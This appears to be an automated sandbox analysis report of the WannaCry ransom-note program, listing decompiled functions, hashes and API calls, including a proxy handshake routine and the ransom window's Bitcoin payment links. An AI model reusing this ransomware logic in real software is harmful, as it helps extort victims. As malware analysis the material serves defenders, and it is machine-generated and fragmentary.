Opcode ID: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
Instruction ID: 8c7778caab8dc427a0eff36806a54932c8fce05917786e5a19e085de530b5182
Opcode Fuzzy Hash: 4f7f19fd77e9e4b6ff3b3df98d071297d87b5023754c0952396fd1cd05ebf564
Instruction Fuzzy Hash: 3F111C742143019FCB1CCF20C8A4ABB77A2AFE8351F15C55DF08A8B361E674D8859B48

Uniqueness

Uniqueness Score: -1.00%

Function 004109C0 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004109C0(signed int __eax, intOrPtr _a4) {
				intOrPtr _t10;

				_t10 = _a4;
				if(_t10 != 0) {
					_t2 = _t10 + 0x10; // 0x683c247c
					if( *_t2 != 0) {
						_t3 = _t10 + 4; // 0x5b5e5fc0
						FindCloseChangeNotification( *_t3); // executed
					}
					_push(_t10);
					L00412C98();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x004109c1
0x004109c7
0x004109ce
0x004109d3
0x004109d5
0x004109d9
0x004109d9
0x004109df
0x004109e0
0x004109eb
0x004109c9
0x004109cd
0x004109cd

APIs

FindCloseChangeNotification.KERNELBASE(5B5E5FC0,?,00410F10,?), ref: 004109D9
#825.MFC42(00410F10,?,00410F10,?), ref: 004109E0

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825ChangeCloseFindNotification
String ID:
API String ID: 3896714138-0
Opcode ID: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
Instruction ID: 03ad0fdb8b1fc462ccda58973351f6a4c3eefe2218a3b6158a688f411921b73e
Opcode Fuzzy Hash: 90d2daed5e4983ce71ebfea6f3955ddb9dc0852fe9265e398c199eb5aa727e0d
Instruction Fuzzy Hash: 22D02EB2818A204B8E20AF7878106CB3B942E013203094A4AF4A5D7381D264ECC183C4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8C0 Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
				void* _v0;
				intOrPtr _v16;
				signed int _v20;
				char _v266;
				char _v267;
				char _v268;
				char _v272;
				char _v280;
				char _v282;
				signed int _v283;
				char _v284;
				void _v287;
				void _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				signed int _v296;
				char _v304;
				char _v312;
				char _v313;
				signed int _v315;
				char _v323;
				signed int _v324;
				signed int _t58;
				signed int _t65;
				signed int* _t66;
				void* _t71;
				void* _t74;
				void* _t86;
				signed int* _t87;
				void _t89;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				void* _t127;
				void* _t132;
				void* _t141;
				intOrPtr _t143;

				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
				if(_t58 != 0) {
					L24:
					return _t58 | 0xffffffff;
				} else {
					_t141 = _v0;
					_t89 = 0;
					_v272 = 0;
					if(_a8 != 0) {
						asm("repne scasb");
						_t89 = 1;
						_v272 = 1;
					}
					_v268 = 5;
					_v267 = 1;
					_v266 = 0;
					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
					if(_t58 < 0) {
						L22:
						_t143 = _a4;
						if(_t143 > 0) {
							__imp__#3(_t143); // executed
						}
						goto L24;
					} else {
						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
							goto L22;
						} else {
							_v292 = 5;
							_v291 = 1;
							_v290 = 0;
							if(_v16 == 0) {
								_v289 = 1;
								_v288 =  *_t141;
								_t65 = _v20;
								_v283 = _t65;
								_v284 = _t65 >> 8;
								_t66 =  &_v282;
							} else {
								_v289 = 3;
								_t111 = _v296 & 0x000000ff;
								_v288 = _t89;
								_t112 = _t111 >> 2;
								memcpy( &_v287, _t141, _t112 << 2);
								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
								_t117 = _v20;
								 *_t86 = _t117 >> 8;
								_t87 = _t86 + 1;
								 *_t87 = _t117;
								_t66 =  &(_t87[0]);
							}
							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
							if(_t58 < 0) {
								goto L22;
							} else {
								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
								if(_t58 < 0) {
									goto L22;
								} else {
									_t58 = _v315;
									if(_t58 != 0) {
										goto L22;
									} else {
										_t71 = _v313 - 1;
										if(_t71 == 0) {
											_t127 = _v0;
											_push(6);
											goto L19;
										} else {
											_t74 = _t71 - 2;
											if(_t74 == 0) {
												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
												_t127 = _v0;
												_push((_v324 & 0x000000ff) + 2);
												_push( &_v323);
												_push(_a4);
												goto L20;
											} else {
												if(_t74 != 1) {
													L21:
													return 0;
												} else {
													_t127 = _v0;
													_push(0x12);
													L19:
													_push( &_v312);
													_push(_a4);
													L20:
													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
													if(_t58 < 0) {
														goto L22;
													} else {
														goto L21;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x0040d8e9
0x0040d8ee
0x0040dab4
0x0040dac1
0x0040d8f4
0x0040d8fb
0x0040d902
0x0040d906
0x0040d90a
0x0040d913
0x0040d91a
0x0040d91c
0x0040d91c
0x0040d930
0x0040d935
0x0040d93a
0x0040d93f
0x0040d944
0x0040daa6
0x0040daa6
0x0040daab
0x0040daae
0x0040daae
0x00000000
0x0040d94a
0x0040d95a
0x0040d95f
0x00000000
0x0040d981
0x0040d988
0x0040d98f
0x0040d994
0x0040d999
0x0040d9db
0x0040d9e0
0x0040d9e4
0x0040d9ed
0x0040d9f4
0x0040d9f8
0x0040d99b
0x0040d9a8
0x0040d9ad
0x0040d9af
0x0040d9b9
0x0040d9bc
0x0040d9c3
0x0040d9c5
0x0040d9d1
0x0040d9d3
0x0040d9d4
0x0040d9d6
0x0040d9d6
0x0040da11
0x0040da16
0x00000000
0x0040da1c
0x0040da2c
0x0040da31
0x00000000
0x0040da33
0x0040da33
0x0040da39
0x00000000
0x0040da3b
0x0040da40
0x0040da41
0x0040da80
0x0040da83
0x00000000
0x0040da43
0x0040da43
0x0040da46
0x0040da62
0x0040da69
0x0040da78
0x0040da7c
0x0040da7d
0x00000000
0x0040da48
0x0040da49
0x0040da97
0x0040daa3
0x0040da4b
0x0040da4b
0x0040da4e
0x0040da85
0x0040da8c
0x0040da8d
0x0040da8e
0x0040da90
0x0040da95
0x00000000
0x00000000
0x00000000
0x00000000
0x0040da95
0x0040da49
0x0040da46
0x0040da41
0x0040da39
0x0040da31
0x0040da16
0x0040d95f
0x0040d944

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00410A10 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410A10(intOrPtr* _a4) {
				intOrPtr _t6;
				long _t10;
				intOrPtr* _t14;

				_t14 = _a4;
				_t6 =  *_t14;
				if(_t6 == 0) {
					L5:
					_t5 = _t14 + 0x1c; // 0x40468
					return  *_t5;
				} else {
					_t2 = _t14 + 1; // 0xffffbdf8
					if( *_t2 == 0) {
						if(_t6 == 0) {
							goto L5;
						} else {
							return 0;
						}
					} else {
						_t3 = _t14 + 4; // 0x830000ff
						_t10 = SetFilePointer( *_t3, 0, 0, 1);
						_t4 = _t14 + 0xc; // 0x14247c89
						return _t10 -  *_t4;
					}
				}
			}

0x00410a11
0x00410a15
0x00410a19
0x00410a41
0x00410a41
0x00410a45
0x00410a1b
0x00410a1b
0x00410a20
0x00410a3b
0x00000000
0x00410a3d
0x00410a40
0x00410a40
0x00410a22
0x00410a22
0x00410a2c
0x00410a32
0x00410a38
0x00410a38
0x00410a20

APIs

SetFilePointer.KERNELBASE(830000FF,00000000,00000000,00000001,?,00410CBB,?,00000000,?,00000000,FFFFFFFF,?), ref: 00410A2C

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e974794341ff6e5ab14436fbc7c1d97085009ff257f2fc2de44bcc3722d2f397
Instruction ID: 32027725d39edc4efdd6a80838e9bbfe12b8ec9337663397b441d42c78647a48
Opcode Fuzzy Hash: e974794341ff6e5ab14436fbc7c1d97085009ff257f2fc2de44bcc3722d2f397
Instruction Fuzzy Hash: CCE04F392447209BCA70CF68A814BD3BBE19F45750F18888AB8DA9BB81C2A5FCC5C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8F0 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040C8F0(intOrPtr* __eax, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr _t7;

				_t5 = __eax;
				_push(0x18); // executed
				L00412CEC(); // executed
				_t6 = _a4;
				if(_t6 == 0) {
					_t6 = __eax;
				}
				 *_t5 = _t6;
				_t7 = _a8;
				if(_t7 == 0) {
					 *((intOrPtr*)(_t5 + 4)) = _t5;
					return _t5;
				} else {
					 *((intOrPtr*)(_t5 + 4)) = _t7;
					return _t5;
				}
			}

0x0040c8f0
0x0040c8f0
0x0040c8f2
0x0040c8f7
0x0040c900
0x0040c902
0x0040c902
0x0040c904
0x0040c906
0x0040c90c
0x0040c914
0x0040c917
0x0040c90e
0x0040c90e
0x0040c911
0x0040c911

APIs

#823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #823
String ID:
API String ID: 3944439427-0
Opcode ID: 978e7c28ec40dcb92e7f5f015123019c4ac679a5b0e7e4509185db9b43198a7e
Instruction ID: 181cdc8cf12c05a8b9a91361c5a521ffeb8e85c4f1c0f104596c53608345ae24
Opcode Fuzzy Hash: 978e7c28ec40dcb92e7f5f015123019c4ac679a5b0e7e4509185db9b43198a7e
Instruction Fuzzy Hash: FBD017B02022018EDB48DB048155A2ABA906F90305F04C03EA58A8B3A1DA308924D719

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00000000), ref: 0040DB71

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65

Uniqueness

Uniqueness Score: -1.00%

Function 004102B0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004102B0(int _a8, int _a12) {
				void* _t4;

				_t4 = calloc(_a8, _a12); // executed
				return _t4;
			}

0x004102ba
0x004102c2

APIs

calloc.MSVCRT ref: 004102BA

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: b99520603795e14427fcdc66bd24236fedacc387ffcb15b9e196dfa964343d57
Instruction ID: 04342e400c51e4aa9d9f1a4926e37004e53e6e9aa7dbc080471d4116a51af395
Opcode Fuzzy Hash: b99520603795e14427fcdc66bd24236fedacc387ffcb15b9e196dfa964343d57
Instruction Fuzzy Hash: 3FB012B95042007FC904FB51DC41C6BB398FBD4201F80884DBC4D42200D539D944C632

Uniqueness

Uniqueness Score: -1.00%

Function 004102D0 Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004102D0(void* _a8) {
				void* _t2;

				_t2 = _a8;
				free(_t2); // executed
				return _t2;
			}

0x004102d0
0x004102d5
0x004102db

APIs

free.MSVCRT(?), ref: 004102D5

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9547fd8474c1228e0edb2c3a8820201b614da8fcf41e046977b995a71f98eb8e
Instruction ID: 587bd5a705c9874b05802bcdcd007e1f5146f32a08b66df6e73241f9cdea139c
Opcode Fuzzy Hash: 9547fd8474c1228e0edb2c3a8820201b614da8fcf41e046977b995a71f98eb8e
Instruction Fuzzy Hash: 22A022B2000200328C00BAA0C00288A2B8C2A80202B20088EB00282020CA38C0C00200

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406F80 Relevance: 130.0, APIs: 67, Strings: 7, Instructions: 536
windowtimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E00406F80(void* __ecx, void* __fp0) {
				struct HFONT__* _t135;
				long _t137;
				long _t138;
				long _t139;
				long _t141;
				long _t142;
				long _t143;
				long _t145;
				long _t146;
				long _t147;
				long _t149;
				void* _t214;
				int _t216;
				int _t235;
				int _t238;
				int _t240;
				int _t242;
				int _t245;
				int _t248;
				int _t251;
				int _t253;
				void* _t260;
				void* _t262;
				int _t339;
				void* _t348;
				int _t352;
				intOrPtr _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				intOrPtr _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				void* _t375;

				_t375 = __fp0;
				_push(0xffffffff);
				_push(E00413E9B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0xd4;
				_t348 = __ecx;
				_push(0);
				E004076A0(__ecx);
				_push(CreateSolidBrush(0xe0));
				L00412D5E();
				_push(CreateSolidBrush(0x121284));
				L00412D5E();
				_push(CreateSolidBrush(0xe000));
				L00412D5E();
				_push(CreateSolidBrush(0xe00000));
				L00412D5E();
				_push(CreateSolidBrush(0));
				L00412D5E();
				_push(CreateSolidBrush(0x3834d1));
				L00412D5E();
				_push(CreateSolidBrush(0x107c10));
				L00412D5E();
				_push(CreateSolidBrush(0xe8a200));
				L00412D5E();
				_push(CreateSolidBrush(0xd77800));
				L00412D5E();
				_push(CreateSolidBrush(0x3cda));
				L00412D5E();
				_t339 = __ecx + 0x880;
				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t216 = __ecx + 0x888;
				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t352 = __ecx + 0x890;
				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t135);
				L00412D5E();
				_push(0x3ed);
				L00412CE6();
				if(_t339 != 0) {
					_t339 =  *(_t339 + 4);
				}
				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
				_push(0x3fe);
				L00412CE6();
				if(_t216 != 0) {
					_t235 =  *(_t216 + 4);
				} else {
					_t235 = 0;
				}
				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
				_push(0x3fb);
				L00412CE6();
				if(_t216 != 0) {
					_t238 =  *(_t216 + 4);
				} else {
					_t238 = 0;
				}
				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
				_push(0x3ff);
				L00412CE6();
				if(_t352 != 0) {
					_t240 =  *(_t352 + 4);
				} else {
					_t240 = 0;
				}
				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
				_push(0x3fc);
				L00412CE6();
				if(_t352 != 0) {
					_t242 =  *(_t352 + 4);
				} else {
					_t242 = 0;
				}
				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
				_push(0x400);
				L00412CE6();
				if(_t352 != 0) {
					_t245 =  *(_t352 + 4);
				} else {
					_t245 = 0;
				}
				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
				_push(0x3fa);
				L00412CE6();
				if(_t352 != 0) {
					_t352 =  *(_t352 + 4);
				}
				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
				_push(0x402);
				L00412CE6();
				if(_t216 != 0) {
					_t248 =  *(_t216 + 4);
				} else {
					_t248 = 0;
				}
				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
				_push(0x3ef);
				L00412CE6();
				if(_t216 != 0) {
					_t251 =  *(_t216 + 4);
				} else {
					_t251 = 0;
				}
				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1);
				_push(0x3eb);
				L00412CE6();
				if(_t216 != 0) {
					_t253 =  *(_t216 + 4);
				} else {
					_t253 = 0;
				}
				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
				_push(0x3ec);
				L00412CE6();
				if(_t216 != 0) {
					_t216 =  *(_t216 + 4);
				}
				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
				_push(_t348 + 0x5be);
				L00412DA0();
				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x290,  *(_t348 + 0x824) ^ 0x00ffffff);
				E00404260(_t348 + 0x2f8,  *(_t348 + 0x824) ^ 0x00ffffff);
				_t260 = _t348 + 0x360;
				E00404260(_t260,  *(_t348 + 0x824) ^ 0x00ffffff);
				_push(_t260);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				_t262 = _t348 + 0x228;
				E00404210(_t262, "https://en.wikipedia.org/wiki/Bitcoin");
				_push(_t262);
				 *((intOrPtr*)(_t356 + 0x18)) = _t356;
				L00412CAA();
				E00404210(_t348 + 0x290, "https://www.google.com/search?q=how+to+buy+bitcoin");
				L00412DA6();
				_push(_t348 + 0x58c);
				_push("mailto:%s");
				_push(_t356 + 0x10);
				 *(_t356 + 0xf8) = 0;
				L00412E00();
				_t357 = _t356 + 8;
				 *((intOrPtr*)(_t357 + 0x18)) = _t357;
				L00412F56();
				E00404210(_t348 + 0x2f8, _t357 + 0x14);
				E00404270(_t348 + 0x888);
				_push( *((intOrPtr*)(_t348 + 0x508)));
				_push("http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s");
				_push(_t357 + 0x10);
				L00412E00();
				_t358 = _t357 + 8;
				 *((intOrPtr*)(_t358 + 0x18)) = _t358;
				L00412F56();
				E00404210(_t348 + 0x360, _t358 + 0x14);
				SendMessageA( *(_t348 + 0x140), 0x406, 0, 0x64);
				SendMessageA( *(_t348 + 0x1c4), 0x406, 0, 0x64);
				_push(0xffffffff);
				_push(2);
				L00412F50();
				_push(0xffffffff);
				_push(2);
				 *( *(_t348 + 0x164)) = 0xe0;
				( *(_t348 + 0x164))[1] = 0xe000;
				L00412F50();
				 *( *(_t348 + 0x1e8)) = 0xe0;
				( *(_t348 + 0x1e8))[1] = 0xe000;
				_t342 = _t348 + 0x3c8;
				E00405820(_t348 + 0x3c8, 1);
				E00405800(_t348 + 0x3c8, 0xb);
				E00405200(_t348 + 0x3c8, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x3c8,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t342, 0xb);
				E004058C0(_t342, 1);
				E00405990(_t342, 1, 0x20);
				E00405180(_t342, "00;00;00;00");
				_t343 = _t348 + 0x444;
				E00405820(_t348 + 0x444, 1);
				E00405800(_t348 + 0x444, 0xb);
				E00405200(_t348 + 0x444, 0);
				_push( *(_t348 + 0x824));
				E00405920(_t348 + 0x444,  *(_t348 + 0x824), 0xffffff);
				E00405860(_t343, 0xb);
				E004058C0(_t343, 1);
				E00405990(_t343, 1, 0x20);
				E00405180(_t343, "00;00;00;00");
				GetTimeZoneInformation(_t358 + 0x38);
				_push(_t358 + 0x28);
				E00401E60(_t375, ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2 + ( *(_t348 + 0x57c) +  *(_t348 + 0x57c) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t359 = _t358 + 8;
				SystemTimeToTzSpecificLocalTime(_t359 + 0x3c, _t359 + 0x28, _t359 + 0x18);
				_push( *(_t359 + 0x24) & 0x0000ffff);
				_push( *(_t359 + 0x22) & 0x0000ffff);
				_push( *(_t359 + 0x20) & 0x0000ffff);
				_push( *(_t359 + 0x1c) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push( *(_t359 + 0x26) & 0x0000ffff);
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t348 + 0x500);
				L00412E00();
				_push(_t359 + 0x48);
				E00401E60(_t375, ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2 + ( *(_t348 + 0x580) +  *(_t348 + 0x580) * 2) * 4) * 4) * 8 << 7) +  *((intOrPtr*)(_t348 + 0x578)));
				_t360 = _t359 + 0x28;
				SystemTimeToTzSpecificLocalTime(_t360 + 0x38, _t360 + 0x28, _t360 + 0x18);
				_push( *(_t360 + 0x24) & 0x0000ffff);
				_push( *(_t360 + 0x22) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x20) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_push( *(_t360 + 0x26) & 0x0000ffff);
				_t214 = _t348 + 0x504;
				_push("%d/%d/%d %02d:%02d:%02d");
				_push(_t214);
				L00412E00();
				_t361 = _t360 + 0x20;
				_push(0);
				L00412E06();
				 *((intOrPtr*)(_t361 + 0xec)) = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *((intOrPtr*)(_t361 + 0xe4));
				return _t214;
			}

0x00406f80
0x00406f86
0x00406f88
0x00406f8d
0x00406f8e
0x00406f95
0x00406f9f
0x00406fa1
0x00406fa3
0x00406fb5
0x00406fbc
0x00406fc8
0x00406fcf
0x00406fdb
0x00406fe2
0x00406fee
0x00406ff5
0x00406ffe
0x00407005
0x00407011
0x00407018
0x00407024
0x0040702b
0x00407037
0x0040703e
0x0040704a
0x00407051
0x0040705d
0x00407064
0x00407091
0x00407099
0x0040709c
0x004070c3
0x004070cb
0x004070ce
0x004070f5
0x004070fb
0x00407101
0x00407104
0x00407109
0x00407110
0x00407117
0x00407119
0x00407119
0x0040712b
0x0040712d
0x00407134
0x0040713b
0x00407141
0x0040713d
0x0040713d
0x0040713d
0x0040714d
0x0040714f
0x00407156
0x0040715d
0x00407163
0x0040715f
0x0040715f
0x0040715f
0x0040716f
0x00407171
0x00407178
0x0040717f
0x00407185
0x00407181
0x00407181
0x00407181
0x00407191
0x00407193
0x0040719a
0x004071a1
0x004071a7
0x004071a3
0x004071a3
0x004071a3
0x004071b3
0x004071b5
0x004071bc
0x004071c3
0x004071c9
0x004071c5
0x004071c5
0x004071c5
0x004071d5
0x004071d7
0x004071de
0x004071e5
0x004071e7
0x004071e7
0x004071f3
0x004071f5
0x004071fc
0x00407203
0x00407209
0x00407205
0x00407205
0x00407205
0x00407215
0x00407217
0x0040721e
0x00407225
0x0040722b
0x00407227
0x00407227
0x00407227
0x00407237
0x00407239
0x00407240
0x00407247
0x0040724d
